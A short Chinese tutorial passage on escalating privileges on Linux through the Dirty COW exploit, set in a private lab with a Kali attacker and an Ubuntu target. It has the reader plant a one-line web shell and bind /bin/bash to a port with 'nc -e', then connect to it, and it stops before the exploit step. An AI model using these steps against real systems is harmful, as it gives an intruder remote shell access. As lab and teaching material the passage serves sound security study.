Linux利用脏牛漏洞提权:
- 提前准备:去github上面下载脏牛(https://github .com/FireFart/dirtycow)
本主机:kali ip: 192.168.223.129
目标机:ubuntu ip:192.168.223.128
提前在目标机上面搭建环境,并开启web服务,上传一句话木马,然后用菜刀连接
打开虚拟终端:
2.利用nc实现正向shell反弹(nc下载指令: sudo apt-get install -y netcat-traditional)
在虚拟终端中输入:
nc -lvp 63777-e /bin/bash (如果出现nc: invalid option - 'e’这样的错误,请尝试sudo rm /etc/alternatives/nc && sudo ln -s /bin/nc.traditional /etc/alternatives/nc)
在kali上输入:
nc 192.168.223.128 63777